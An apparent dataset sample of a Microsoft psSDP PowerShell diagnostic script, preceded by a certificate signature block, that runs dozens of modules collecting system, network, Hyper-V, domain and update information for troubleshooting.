# C5YR4WOSmUKWfdJ5DJDBZV8uLD74w3LRbYP+vj/oCso7v0epo/Np22O/IjWll11l
# hJB9i0ZQVdgMknzSGksc8zxCi1LQsP1r4z4HLimb5j0bpdS1HXeUOeLpZMlEPXh6
# I/MTfaaQdION9MsmAkYqwooQu6SpBQyb7Wj6aC6VoCo/KmtYSWMfCWluWpiW5IP0
# wI/zRive/DvQvTXvbiWu5a8n7dDd8w6vmSiXmE0OPQvyCInWH8MyGOLwxS3OW560
# STkKxgrCxq2u5bLZ2xWIUUVYODJxJxp/sfQn+N4sOiBpmLJZiWhub6e3dMNABQam
# ASooPoI/E01mC8CzTfXhj38cbxV9Rad25UAqZaPDXVJihsMdYzaXht/a8/jyFqGa
# J+HNpZfQ7l1jQeNbB5yHPgZ3BtEGsXUfFL5hYbXw3MYbBL7fQccOKO7eZS/sl/ah
# XJbYANahRr1Z85elCUtIEJmAH9AAKcWxm6U/RXceNcbSoqKfenoi+kiVH6v7RyOA
# 9Z74v2u3S5fi63V4GuzqN5l5GEv/1rMjaHXmr/r8i+sLgOppO6/8MO0ETI7f33Vt
# Y5E90Z1WTk+/gFcioXgRMiF670EKsT/7qMykXcGhiJtXcVZOSEXAQsmbdlsKgEhr
# /Xmfwb1tbWrJUnMTDXpQzTGCGZ8wghmbAgEBMIGVMH4xCzAJBgNVBAYTAlVTMRMw
# EQYDVQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdSZWRtb25kMR4wHAYDVQQKExVN
# aWNyb3NvZnQgQ29ycG9yYXRpb24xKDAmBgNVBAMTH01pY3Jvc29mdCBDb2RlIFNp
# Z25pbmcgUENBIDIwMTECEzMAAAOvMEAOTKNNBUEAAAAAA68wDQYJYIZIAWUDBAIB
# BQCgga4wGQYJKoZIhvcNAQkDMQwGCisGAQQBgjcCAQQwHAYKKwYBBAGCNwIBCzEO
# MAwGCisGAQQBgjcCARUwLwYJKoZIhvcNAQkEMSIEIOcHa+wD3RUJlM5rjGlfS8hg
# iL6bfstZuU5jBySJHfXAMEIGCisGAQQBgjcCAQwxNDAyoBSAEgBNAGkAYwByAG8A
# cwBvAGYAdKEagBhodHRwOi8vd3d3Lm1pY3Jvc29mdC5jb20wDQYJKoZIhvcNAQEB
# BQAEggEAuIf5Sqnv6cFu9kM02kkg5FnGD8pN+3/X4DxHFKyveLqOvi/tRPeDJifR
# Z+YBeCWlF2g+EBhDNW1+002pi7NArerBNwcNMvA2Oqma6Md3Xu1EzeNkVnlD8cW8
# A1evV7hUpwfhMu/3GR4jL2C5xlnW3KA2CRSfnh73vqzyMSXy/wDR9Ypoq9TC7rKB
# EnGwG+RO0M++bNWMqP5VvdJT9xTN7NIvr27JHWpT9p8+C8jIr1JnOl9xekIgHJsO
# Vhj15W8XkliZdzCIlWWj/6MSvLWumTeAh53dR7N8MqhWQdDSvbo4iVwJoXO+fdoO
# uqN4yHlx3McMHM7WNg3ad2/JmMgnrqGCFykwghclBgorBgEEAYI3AwMBMYIXFTCC
# FxEGCSqGSIb3DQEHAqCCFwIwghb+AgEDMQ8wDQYJYIZIAWUDBAIBBQAwggFZBgsq
# hkiG9w0BCRABBKCCAUgEggFEMIIBQAIBAQYKKwYBBAGEWQoDATAxMA0GCWCGSAFl
# AwQCAQUABCBTlqmAlixf59Sqq6jW8+cTmRIrsjLv5Qn13u3ED/vkHAIGZbqk0RmU
# GBMyMDI0MDIxMjE0MDYyOS41NzRaMASAAgH0oIHYpIHVMIHSMQswCQYDVQQGEwJV
# UzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9uZDEeMBwGA1UE
# ChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMS0wKwYDVQQLEyRNaWNyb3NvZnQgSXJl
# bGFuZCBPcGVyYXRpb25zIExpbWl0ZWQxJjAkBgNVBAsTHVRoYWxlcyBUU1MgRVNO
# OkZDNDEtNEJENC1EMjIwMSUwIwYDVQQDExxNaWNyb3NvZnQgVGltZS1TdGFtcCBT
# ZXJ2aWNloIIReDCCBycwggUPoAMCAQICEzMAAAHimZmV8dzjIOsAAQAAAeIwDQYJ
# KoZIhvcNAQELBQAwfDELMAkGA1UEBhMCVVMxEzARBgNVBAgTCldhc2hpbmd0b24x
# EDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoTFU1pY3Jvc29mdCBDb3Jwb3JhdGlv
# bjEmMCQGA1UEAxMdTWljcm9zb2Z0IFRpbWUtU3RhbXAgUENBIDIwMTAwHhcNMjMx
# MDEyMTkwNzI1WhcNMjUwMTEwMTkwNzI1WjCB0jELMAkGA1UEBhMCVVMxEzARBgNV
# BAgTCldhc2hpbmd0b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoTFU1pY3Jv
# c29mdCBDb3Jwb3JhdGlvbjEtMCsGA1UECxMkTWljcm9zb2Z0IElyZWxhbmQgT3Bl
# cmF0aW9ucyBMaW1pdGVkMSYwJAYDVQQLEx1UaGFsZXMgVFNTIEVTTjpGQzQxLTRC
# RDQtRDIyMDElMCMGA1UEAxMcTWljcm9zb2Z0IFRpbWUtU3RhbXAgU2VydmljZTCC
# AiIwDQYJKoZIhvcNAQEBBQADggIPADCCAgoCggIBALVjtZhV+kFmb8cKQpg2mzis
# DlRI978Gb2amGvbAmCd04JVGeTe/QGzM8KbQrMDol7DC7jS03JkcrPsWi9WpVwsI
# ckRQ8AkX1idBG9HhyCspAavfuvz55khl7brPQx7H99UJbsE3wMmpmJasPWpgF05z
# ZlvpWQDULDcIYyl5lXI4HVZ5N6MSxWO8zwWr4r9xkMmUXs7ICxDJr5a39SSePAJR
# IyznaIc0WzZ6MFcTRzLLNyPBE4KrVv1LFd96FNxAzwnetSePg88EmRezr2T3HTFE
# lneJXyQYd6YQ7eCIc7yllWoY03CEg9ghorp9qUKcBUfFcS4XElf3GSERnlzJsK7s
# /ZGPU4daHT2jWGoYha2QCOmkgjOmBFCqQFFwFmsPrZj4eQszYxq4c4HqPnUu4hT4
# aqpvUZ3qIOXbdyU42pNL93cn0rPTTleOUsOQbgvlRdthFCBepxfb6nbsp3fcZaPB
# fTbtXVa8nLQuMCBqyfsebuqnbwj+lHQfqKpivpyd7KCWACoj78XUwYqy1HyYnStT
# me4T9vK6u2O/KThfROeJHiSg44ymFj+34IcFEhPogaKvNNsTVm4QbqphCyknrwBy
# qorBCLH6bllRtJMJwmu7GRdTQsIx2HMKqphEtpSm1z3ufASdPrgPhsQIRFkHZGui
# hL1Jjj4Lu3CbAmha0lOrAgMBAAGjggFJMIIBRTAdBgNVHQ4EFgQURIQOEdq+7Qds
# lptJiCRNpXgJ2gUwHwYDVR0jBBgwFoAUn6cVXQBeYl2D9OXSZacbUzUZ6XIwXwYD
# VR0fBFgwVjBUoFKgUIZOaHR0cDovL3d3dy5taWNyb3NvZnQuY29tL3BraW9wcy9j
# cmwvTWljcm9zb2Z0JTIwVGltZS1TdGFtcCUyMFBDQSUyMDIwMTAoMSkuY3JsMGwG
# CCsGAQUFBwEBBGAwXjBcBggrBgEFBQcwAoZQaHR0cDovL3d3dy5taWNyb3NvZnQu
# Y29tL3BraW9wcy9jZXJ0cy9NaWNyb3NvZnQlMjBUaW1lLVN0YW1wJTIwUENBJTIw
# MjAxMCgxKS5jcnQwDAYDVR0TAQH/BAIwADAWBgNVHSUBAf8EDDAKBggrBgEFBQcD
# CDAOBgNVHQ8BAf8EBAMCB4AwDQYJKoZIhvcNAQELBQADggIBAORURDGrVRTbnulf
# sg2cTsyyh7YXvhVU7NZMkITAQYsFEPVgvSviCylr5ap3ka76Yz0t/6lxuczI6w7t
# Xq8n4WxUUgcj5wAhnNorhnD8ljYqbck37fggYK3+wEwLhP1PGC5tvXK0xYomU1nU
# +lXOy9ZRnShI/HZdFrw2srgtsbWow9OMuADS5lg7okrXa2daCOGnxuaD1IO+65E7
# qv2O0W0sGj7AWdOjNdpexPrspL2KEcOMeJVmkk/O0ganhFzzHAnWjtNWneU11WQ6
# Bxv8OpN1fY9wzQoiycgvOOJM93od55EGeXxfF8bofLVlUE3zIikoSed+8s61NDP+
# x9RMya2mwK/Ys1xdvDlZTHndIKssfmu3vu/a+BFf2uIoycVTvBQpv/drRJD68eo4
# 01mkCRFkmy/+BmQlRrx2rapqAu5k0Nev+iUdBUKmX/iOaKZ75vuQg7hCiBA5xIm5
# ZIXDSlX47wwFar3/BgTwntMq9ra6QRAeS/o/uYWkmvqvE8Aq38QmKgTiBnWSS/uV
# PcaHEyArnyFh5G+qeCGmL44MfEnFEhxc3saPmXhe6MhSgCIGJUZDA7336nQD8fn4
# y6534Lel+LuT5F5bFt0mLwd+H5GxGzObZmm/c3pEWtHv1ug7dS/Dfrcd1sn2E4gk
# 4W1L1jdRBbK9xwkMmwY+CHZeMSvBMIIHcTCCBVmgAwIBAgITMwAAABXF52ueAptJ
# mQAAAAAAFTANBgkqhkiG9w0BAQsFADCBiDELMAkGA1UEBhMCVVMxEzARBgNVBAgT
# Cldhc2hpbmd0b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoTFU1pY3Jvc29m
# dCBDb3Jwb3JhdGlvbjEyMDAGA1UEAxMpTWljcm9zb2Z0IFJvb3QgQ2VydGlmaWNh
# dGUgQXV0aG9yaXR5IDIwMTAwHhcNMjEwOTMwMTgyMjI1WhcNMzAwOTMwMTgzMjI1
# WjB8MQswCQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMH
# UmVkbW9uZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMSYwJAYDVQQD
# Ex1NaWNyb3NvZnQgVGltZS1TdGFtcCBQQ0EgMjAxMDCCAiIwDQYJKoZIhvcNAQEB
# BQADggIPADCCAgoCggIBAOThpkzntHIhC3miy9ckeb0O1YLT/e6cBwfSqWxOdcjK
# NVf2AX9sSuDivbk+F2Az/1xPx2b3lVNxWuJ+Slr+uDZnhUYjDLWNE893MsAQGOhg
# fWpSg0S3po5GawcU88V29YZQ3MFEyHFcUTE3oAo4bo3t1w/YJlN8OWECesSq/XJp
# rx2rrPY2vjUmZNqYO7oaezOtgFt+jBAcnVL+tuhiJdxqD89d9P6OU8/W7IVWTe/d
# vI2k45GPsjksUZzpcGkNyjYtcI4xyDUoveO0hyTD4MmPfrVUj9z6BVWYbWg7mka9
# 7aSueik3rMvrg0XnRm7KMtXAhjBcTyziYrLNueKNiOSWrAFKu75xqRdbZ2De+JKR
# Hh09/SDPc31BmkZ1zcRfNN0Sidb9pSB9fvzZnkXftnIv231fgLrbqn427DZM9itu
# qBJR6L8FA6PRc6ZNN3SUHDSCD/AQ8rdHGO2n6Jl8P0zbr17C89XYcz1DTsEzOUyO
# ArxCaC4Q6oRRRuLRvWoYWmEBc8pnol7XKHYC4jMYctenIPDC+hIK12NvDMk2ZItb
# oKaDIV1fMHSRlJTYuVD5C4lh8zYGNRiER9vcG9H9stQcxWv2XFJRXRLbJbqvUAV6
# bMURHXLvjflSxIUXk8A8FdsaN8cIFRg/eKtFtvUeh17aj54WcmnGrnu3tz5q4i6t
# AgMBAAGjggHdMIIB2TASBgkrBgEEAYI3FQEEBQIDAQABMCMGCSsGAQQBgjcVAgQW
# BBQqp1L+ZMSavoKRPEY1Kc8Q/y8E7jAdBgNVHQ4EFgQUn6cVXQBeYl2D9OXSZacb
# UzUZ6XIwXAYDVR0gBFUwUzBRBgwrBgEEAYI3TIN9AQEwQTA/BggrBgEFBQcCARYz
# aHR0cDovL3d3dy5taWNyb3NvZnQuY29tL3BraW9wcy9Eb2NzL1JlcG9zaXRvcnku
# aHRtMBMGA1UdJQQMMAoGCCsGAQUFBwMIMBkGCSsGAQQBgjcUAgQMHgoAUwB1AGIA
# QwBBMAsGA1UdDwQEAwIBhjAPBgNVHRMBAf8EBTADAQH/MB8GA1UdIwQYMBaAFNX2
# VsuP6KJcYmjRPZSQW9fOmhjEMFYGA1UdHwRPME0wS6BJoEeGRWh0dHA6Ly9jcmwu
# bWljcm9zb2Z0LmNvbS9wa2kvY3JsL3Byb2R1Y3RzL01pY1Jvb0NlckF1dF8yMDEw
# LTA2LTIzLmNybDBaBggrBgEFBQcBAQROMEwwSgYIKwYBBQUHMAKGPmh0dHA6Ly93
# d3cubWljcm9zb2Z0LmNvbS9wa2kvY2VydHMvTWljUm9vQ2VyQXV0XzIwMTAtMDYt
# MjMuY3J0MA0GCSqGSIb3DQEBCwUAA4ICAQCdVX38Kq3hLB9nATEkW+Geckv8qW/q
# XBS2Pk5HZHixBpOXPTEztTnXwnE2P9pkbHzQdTltuw8x5MKP+2zRoZQYIu7pZmc6
# U03dmLq2HnjYNi6cqYJWAAOwBb6J6Gngugnue99qb74py27YP0h1AdkY3m2CDPVt
# I1TkeFN1JFe53Z/zjj3G82jfZfakVqr3lbYoVSfQJL1AoL8ZthISEV09J+BAljis
# 9/kpicO8F7BUhUKz/AyeixmJ5/ALaoHCgRlCGVJ1ijbCHcNhcy4sa3tuPywJeBTp
# kbKpW99Jo3QMvOyRgNI95ko+ZjtPu4b6MhrZlvSP9pEB9s7GdP32THJvEKt1MMU0
# sHrYUP4KWN1APMdUbZ1jdEgssU5HLcEUBHG/ZPkkvnNtyo4JvbMBV0lUZNlz138e
# W0QBjloZkWsNn6Qo3GcZKCS6OEuabvshVGtqRRFHqfG3rsjoiV5PndLQTHa1V1QJ
# sWkBRH58oWFsc/4Ku+xBZj1p/cvBQUl+fpO+y/g75LcVv7TOPqUxUYS8vwLBgqJ7
# Fx0ViY1w/ue10CgaiQuPNtq6TPmb/wrpNPgkNWcr4A245oyZ1uEi6vAnQj0llOZ0
# dFtq0Z4+7X6gMTN9vMvpe784cETRkPHIqzqKOghif9lwY1NNje6CbaUFEMFxBmoQ
# tB1VM1izoXBm8qGCAtQwggI9AgEBMIIBAKGB2KSB1TCB0jELMAkGA1UEBhMCVVMx
# EzARBgNVBAgTCldhc2hpbmd0b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoT
# FU1pY3Jvc29mdCBDb3Jwb3JhdGlvbjEtMCsGA1UECxMkTWljcm9zb2Z0IElyZWxh
# bmQgT3BlcmF0aW9ucyBMaW1pdGVkMSYwJAYDVQQLEx1UaGFsZXMgVFNTIEVTTjpG
# QzQxLTRCRDQtRDIyMDElMCMGA1UEAxMcTWljcm9zb2Z0IFRpbWUtU3RhbXAgU2Vy
# dmljZaIjCgEBMAcGBSsOAwIaAxUAFpuZafp0bnpJdIhfiB1d8pTohm+ggYMwgYCk
# fjB8MQswCQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMH
# UmVkbW9uZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMSYwJAYDVQQD
# Ex1NaWNyb3NvZnQgVGltZS1TdGFtcCBQQ0EgMjAxMDANBgkqhkiG9w0BAQUFAAIF
# AOl0S1kwIhgPMjAyNDAyMTIxNTQ2MzNaGA8yMDI0MDIxMzE1NDYzM1owdDA6Bgor
# BgEEAYRZCgQBMSwwKjAKAgUA6XRLWQIBADAHAgEAAgIVwzAHAgEAAgIUTzAKAgUA
# 6XWc2QIBADA2BgorBgEEAYRZCgQCMSgwJjAMBgorBgEEAYRZCgMCoAowCAIBAAID
# B6EgoQowCAIBAAIDAYagMA0GCSqGSIb3DQEBBQUAA4GBAKSvdq5/OwSqLipXDPR/
# fz5CiLbm0lCxv+PjDUqfK5ccPWEVkKsD9zmiB4N1ZQarjww5WUro+QdoUzSzV/Ly
# OaxhyB8c2JwDLLMQK8JyHWefD6cG4cvgYDg5iEzioerBrjSnrGxsb3qVV0n31Fhc
# Z9Hh71O9RocFcjpVHRSVEF7MMYIEDTCCBAkCAQEwgZMwfDELMAkGA1UEBhMCVVMx
# EzARBgNVBAgTCldhc2hpbmd0b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoT
# FU1pY3Jvc29mdCBDb3Jwb3JhdGlvbjEmMCQGA1UEAxMdTWljcm9zb2Z0IFRpbWUt
# U3RhbXAgUENBIDIwMTACEzMAAAHimZmV8dzjIOsAAQAAAeIwDQYJYIZIAWUDBAIB
# BQCgggFKMBoGCSqGSIb3DQEJAzENBgsqhkiG9w0BCRABBDAvBgkqhkiG9w0BCQQx
# IgQgvFJkCII72ACoWGQNdfJGS5hszmfpHqX1UTAhAp1iQQcwgfoGCyqGSIb3DQEJ
# EAIvMYHqMIHnMIHkMIG9BCAriSpKEP0muMbBUETODoL4d5LU6I/bjucIZkOJCI9/
# /zCBmDCBgKR+MHwxCzAJBgNVBAYTAlVTMRMwEQYDVQQIEwpXYXNoaW5ndG9uMRAw
# DgYDVQQHEwdSZWRtb25kMR4wHAYDVQQKExVNaWNyb3NvZnQgQ29ycG9yYXRpb24x
# JjAkBgNVBAMTHU1pY3Jvc29mdCBUaW1lLVN0YW1wIFBDQSAyMDEwAhMzAAAB4pmZ
# lfHc4yDrAAEAAAHiMCIEII1oQoIqDDF/dls2LazpjkRTP0GoZvbNELQJtb8XKdao
# MA0GCSqGSIb3DQEBCwUABIICAE1Hkfz+rzz1wK8G+53cgmWhFcltX0ylDhmHWilL
# s3oQ/TziJxEbB2au7mhOXW2wMvhfp8YbpBYCQPdFYgtBL6Fib1FtawFZfW4ZNNhX
# Ylid/5nHKjp1yIG6hXwdeIoe0mhJ3aEI6zhMd5qJTaSaNnr8ucFnsdU2uQVhTK4s
# sL1SV5zoJ7K/ub7d8MZMg+q48vbz9kBRPpofF5xIC6xuZeUrNndXivTea/f3dYcZ
# NwQ0mqrXfkXefZwOkdmAWnI7P9obDUnVD10BTjLItf9jr09lRlqjzy7l6zjU6Yjo
# epdQzIwFr5IeSIFhF32ZhC/YFgn/BrHLfC/Fb5rUOPLZtWcF6mUa3XzRjHx+p6vS
# jp8ChKgekLYfrB7BR4eGgd+ILyDlGJWyxrBeqK8L3nK23nhu0kMVzA3MCpYzw8r5
# mr1pi46X3ru0DDKBGCzOTg9jlSbVuJ40UDRaPMxEOwMnmcoS1mrRV9Kog6Q7mSLm
# 8wmMWbGOf3/IFmfg+9mow3cLSqA4EtCcsgc7PBvvESdYT6BK4oX91u6eTRaI5JHp
# +iyq+7RxW02BdZqogxWwVe0zAuyC0rchoVxmMqBzvVeCr0I3Ixs/8ArlOdUUpOyl
# 0rDtR9AoPwaRbqV92h2TEYF4HIgPuxZWRWuh8cVi7x94nLy6ceDmVkYhv6Rr/8Kq
# 8+Yy
# SIG # End signature block
|
combined_dataset/train/non-malicious/sample_3_11.ps1
|
sample_3_11.ps1
|
# 2023-02-24 WalterE mod Trap #we#
$startTime_AutoAdd = Get-Date
trap [Exception]{
WriteTo-StdOut "$($_.InvocationInfo.ScriptName)($($_.InvocationInfo.ScriptLineNumber)): $_" -shortformat; continue
Write-Host "$($_.InvocationInfo.ScriptName)($($_.InvocationInfo.ScriptLineNumber)): $_"
}
Write-Host -BackgroundColor Gray -ForegroundColor Black -Object " --- $(Get-Date -Format 'yy-mm-dd HH:mm:ss') $Global:SDPtech - Collect Phase module: common ---"
# version of the psSDP Diagnostic - "_psSDP_DiagnosticVersion.TXT"
Run-DiagExpression .\DC_NetworkingDiagnostic.ps1
# MSInfo
Run-DiagExpression .\DC_MSInfo.ps1
# Obtain pstat output
Run-DiagExpression .\DC_PStat.ps1
# CheckSym
Run-DiagExpression .\DC_ChkSym.ps1
# AutoRuns Information
Run-DiagExpression .\DC_Autoruns.ps1
# Collects Windows Server 2008/R2 Server Manager Information
Run-DiagExpression .\DC_ServerManagerInfo.ps1
# List Schedule Tasks using schtasks.exe utility
Run-DiagExpression .\DC_ScheduleTasks.ps1
# Collect Machine Registry Information for Setup and Performance Diagnostics
Run-DiagExpression .\DC_RegistrySetupPerf.ps1
# GPResults.exe Output
Run-DiagExpression .\DC_RSoP.ps1
# Basic System Information
Run-DiagExpression .\DC_BasicSystemInformation.ps1
# Basic System Information TXT output
Run-DiagExpression .\DC_BasicSystemInformationTXT.ps1
# Services
Run-DiagExpression .\DC_Services.ps1
# TaskListSvc
Run-DiagExpression .\DC_TaskListSvc.ps1
# User Rights (privileges) via the userrights.exe tool
Run-DiagExpression .\DC_UserRights.ps1
# WhoAmI
Run-DiagExpression .\DC_Whoami.ps1
# PoolMon
Run-DiagExpression .\DC_PoolMon.ps1
# Collects registry entries for KIR (for 2019) and RBC (for 2016)
Run-DiagExpression .\DC_KIR-RBC-RegEntries.ps1
#_# Collect summary report
Run-DiagExpression .\DC_SummaryReliability.ps1
Write-Host -BackgroundColor Gray -ForegroundColor Black -Object " --- $(Get-Date -Format 'yy-mm-dd HH:mm:ss') $Global:SDPtech - Collect Phase module: Net ---"
# 802.1x Client Component
Run-DiagExpression .\DC_8021xClient-Component.ps1
# BITS Client Component
Run-DiagExpression .\DC_BitsClient-Component.ps1
# BITS Server Component
Run-DiagExpression .\DC_BitsServer-Component.ps1
# Bluetooth Component
Run-DiagExpression .\DC_Bluetooth-Component.ps1
# BranchCache
Run-DiagExpression .\DC_BranchCache-Component.ps1
# Bridge
Run-DiagExpression .\DC_Bridge-Component.ps1
# Certificates Component
Run-DiagExpression .\DC_Certificates-Component.ps1
# CscClient
Run-DiagExpression .\DC_CscClient-Component.ps1
# DFS Client Component
Run-DiagExpression .\DC_DFSClient-Component.ps1
# DFS Server Component
Run-DiagExpression .\DC_DFSServer-Component.ps1
# DHCP Client Component
Run-DiagExpression .\DC_DhcpClient-Component.ps1
# DHCP Server Component
Run-DiagExpression .\DC_DhcpServer-Component.ps1
# DirectAccess Client Component
Run-DiagExpression .\DC_DirectAccessClient-Component.ps1
# DirectAccess Server Component
Run-DiagExpression .\DC_DirectAccessServer-Component.ps1
# DNS Client Component
Run-DiagExpression .\DC_DNSClient-Component.ps1
# DNS Server Component
Run-DiagExpression .\DC_DNSServer-Component.ps1
# DNS DHCP Dynamic Updates
Run-DiagExpression .\DC_DnsDhcpDynamicUpdates.ps1
# Firewall
Run-DiagExpression .\DC_Firewall-Component.ps1
# Capture pfirewall.log
Run-DiagExpression .\DC_PFirewall.ps1
# FolderRedirection
Run-DiagExpression .\DC_FolderRedirection-Component.ps1
# GroupPolicyClient
Run-DiagExpression .\DC_GroupPolicyClient-Component.ps1
# HTTP
Run-DiagExpression .\DC_HTTP-Component.ps1
# InternetExplorer
Run-DiagExpression .\DC_InternetExplorer-Component.ps1
# IPAM Component
Run-DiagExpression .\DC_IPAM-Component.ps1
# IPsec
Run-DiagExpression .\DC_IPsec-Component.ps1
# MUP Component
Run-DiagExpression .\DC_MUP-Component.ps1
# NAP Client Component
Run-DiagExpression .\DC_NAPClient-Component.ps1
# NAP Server Component
Run-DiagExpression .\DC_NAPServer-Component.ps1
# NetLBFO
Run-DiagExpression .\DC_NetLBFO-Component.ps1
# NetworkConnections
Run-DiagExpression .\DC_NetworkConnections-Component.ps1
# NetworkList
Run-DiagExpression .\DC_NetworkList-Component.ps1
# NetworkLocationAwareness
Run-DiagExpression .\DC_NetworkLocationAwareness-Component.ps1
# Network Shortcuts (Network Locations)
Run-DiagExpression .\DC_NetworkShortcuts.ps1
# NetworkStoreInterface
Run-DiagExpression .\DC_NetworkStoreInterface-Component.ps1
# NFS Client Component
Run-DiagExpression .\DC_NfsClient-Component.ps1
# NFS Server Component
Run-DiagExpression .\DC_NfsServer-Component.ps1
# NLB Component
Run-DiagExpression .\DC_NLB-Component.ps1
# NPS
Run-DiagExpression .\DC_NPS-Component.ps1
# P2P
Run-DiagExpression .\DC_P2P-Component.ps1
# Proxy Configuration
Run-DiagExpression .\DC_ProxyConfiguration.ps1
# RAS
Run-DiagExpression .\DC_RAS-Component.ps1
# RDG Component
Run-DiagExpression .\DC_RDG-Component.ps1
# Remote File Systems Client Component
Run-DiagExpression .\DC_RemoteFileSystemsClient-Component.ps1
# Remote File Systems Server Component
Run-DiagExpression .\DC_RemoteFileSystemsServer-Component.ps1
# RPC
Run-DiagExpression .\DC_RPC-Component.ps1
# SChannel
Run-DiagExpression .\DC_SChannel-Component.ps1
# SMB Client Component
Run-DiagExpression .\DC_SMBClient-Component.ps1
# SMB Server Component
Run-DiagExpression .\DC_SMBServer-Component.ps1
# SNMP
Run-DiagExpression .\DC_SNMP-Component.ps1
# TCPIP Component
Run-DiagExpression .\DC_TCPIP-Component.ps1
# WebClient
Run-DiagExpression .\DC_WebClient-Component.ps1
# WinHTTP
Run-DiagExpression .\DC_WinHTTP-Component.ps1
# WINSClient
Run-DiagExpression .\DC_WINSClient-Component.ps1
# WinSock
Run-DiagExpression .\DC_WinSock-Component.ps1
# WINSServer
Run-DiagExpression .\DC_WINSServer-Component.ps1
# Collects W32Time information, Basic will not run "W32TM /Monitor" and "W32TM /TestIf /QPS"
Run-DiagExpression .\DC_W32Time.ps1 -LogType "Basic"
# Collects DsRegCmd information
Run-DiagExpression .\DC_DsRegCmd.ps1
Write-Host -BackgroundColor Gray -ForegroundColor Black -Object " --- $(Get-Date -Format 'yy-mm-dd HH:mm:ss') $Global:SDPtech - Collect Phase module: HyperV ---"
#_# Hyper-V Info 2008R2
Run-DiagExpression .\DC_HyperVBasicInfo.ps1
# Hyper-V Networking Info
#_#Run-DiagExpression .\DC_HyperVNetInfo.ps1
# Hyper-V Networking Settings
Run-DiagExpression .\DC_HyperVNetworking.ps1
# Hyper-V Network Virtualization
Run-DiagExpression .\DC_HyperVNetworkVirtualization.ps1
Write-Host -BackgroundColor Gray -ForegroundColor Black -Object " --- $(Get-Date -Format 'yy-mm-dd HH:mm:ss') $Global:SDPtech - Collect Phase module: DOM ---"
# Kerberos tickets and TGT via klist utility #_# same as DC_Kerberos-Component
#Run-DiagExpression .\DC_KList.ps1
# Kerberos Component
Run-DiagExpression .\DC_Kerberos-Component.ps1
# Obtain Netlogon Log
Run-DiagExpression .\DC_NetlogonLog.ps1
# Collects NetSetup.Log from %windir%\debug
Run-DiagExpression .\DC_NetSetupLog.ps1
# Collects winlogon Log from %windir%\security\logs\winlogon.log
Run-DiagExpression .\DC_WinlogonLog.ps1
# Collects system security settings (INF) via secedit utility
Run-DiagExpression .\DC_SystemSecuritySettingsINF.ps1
# Collects registry entries for Directory Services support
Run-DiagExpression .\DC_DSRegEntries.ps1
Write-Host -BackgroundColor Gray -ForegroundColor Black -Object " --- $(Get-Date -Format 'yy-mm-dd HH:mm:ss') $Global:SDPtech - Collect Phase module: Setup ---"
# Fltmc
Run-DiagExpression .\DC_Fltmc.ps1
# Obtain information about Upper and lower filters Information fltrfind.exe utility
Run-DiagExpression .\DC_Fltrfind.ps1
Write-Host -BackgroundColor Gray -ForegroundColor Black -Object " --- $(Get-Date -Format 'yy-mm-dd HH:mm:ss') $Global:SDPtech - Collect Phase module: Update ---"
# Update History
Run-DiagExpression .\DC_UpdateHistory.ps1
# Collect WindowsUpdate.Log
Run-DiagExpression .\DC_WindowsUpdateLog.ps1
Write-Host -BackgroundColor Gray -ForegroundColor Black -Object " --- $(Get-Date -Format 'yy-mm-dd HH:mm:ss') $Global:SDPtech - Collect Phase module: Surface ---"
# Surface Pro 3
Run-DiagExpression .\DC_SurfacePro3.ps1
Write-Host -BackgroundColor Gray -ForegroundColor Black -Object " --- $(Get-Date -Format 'yy-mm-dd HH:mm:ss') $Global:SDPtech - Collect Phase module: Storage ---"
# Collects DiskInfo - related data for Disk Diagnostics
Run-DiagExpression .\DC_DiskInfo.ps1
Write-Host -BackgroundColor Gray -ForegroundColor Black -Object " --- $(Get-Date -Format 'yy-mm-dd HH:mm:ss') $Global:SDPtech - Collect Phase module: Performance Data ---"
# Performance Monitor - System Performance Data Collector
Run-DiagExpression .\TS_PerfmonSystemPerf.ps1 -NumberOfSeconds 60 -DataCollectorSetXMLName "SystemPerformance.xml"
Write-Host -BackgroundColor Gray -ForegroundColor Black -Object " --- $(Get-Date -Format 'yy-mm-dd HH:mm:ss') $Global:SDPtech - Collect Phase module: Net NetworkAdapters---"
# NetworkAdapters
Run-DiagExpression .\DC_NetworkAdapters-Component.ps1
Write-Host -BackgroundColor Gray -ForegroundColor Black -Object " --- $(Get-Date -Format 'yy-mm-dd HH:mm:ss') $Global:SDPtech - Collect Phase: Done ---"
Write-Host "...Next step: Troubleshooting section, if it hangs, run script with parameter SkipTS"
if ($Global:skipTS -ne $true) {
Write-Host -BackgroundColor Gray -ForegroundColor Black -Object " --- $(Get-Date -Format 'yy-mm-dd HH:mm:ss') $Global:SDPtech - Diag Phase module: TS_common ---"
Run-DiagExpression .\TS_DumpCollector.ps1 -CopyWERMinidumps -CopyMachineMiniDumps -MaxFileSize 300 -CopyUserDumps -CopyWERFulldumps
# Detects and alerts evaluation media
Run-DiagExpression .\TS_EvalMediaDetection.ps1
# Debug/GFlags check
Run-DiagExpression .\TS_DebugFlagsCheck.ps1
# Information about Processes resource usage and top Kernel memory tags
Run-DiagExpression .\TS_ProcessInfo.ps1
# RC_32GBMemoryKB2634907
Run-DiagExpression .\RC_32GBMemoryKB2634907.ps1
# Checking if Registry Size Limit setting is present on the system
Run-DiagExpression .\TS_RegistrySizeLimitCheck.ps1
# Running powercfg.exe to obtain power settings information
Run-DiagExpression .\TS_PowerCFG.ps1
Write-Host -BackgroundColor Gray -ForegroundColor Black -Object " --- $(Get-Date -Format 'yy-mm-dd HH:mm:ss') $Global:SDPtech - Diag Phase module: TS_Net ---"
# Check for ephemeral port usage
Run-DiagExpression .\TS_PortUsage.ps1
# RC_KB2647170_CnameCheck
Run-DiagExpression .\RC_KB2647170_CnameCheck.ps1
# FirewallCheck
Run-DiagExpression .\RC_FirewallCheck.ps1
# IPv66To4Check
Run-DiagExpression .\RC_IPv66To4Check.ps1
# RC_HTTPRedirectionTSGateway
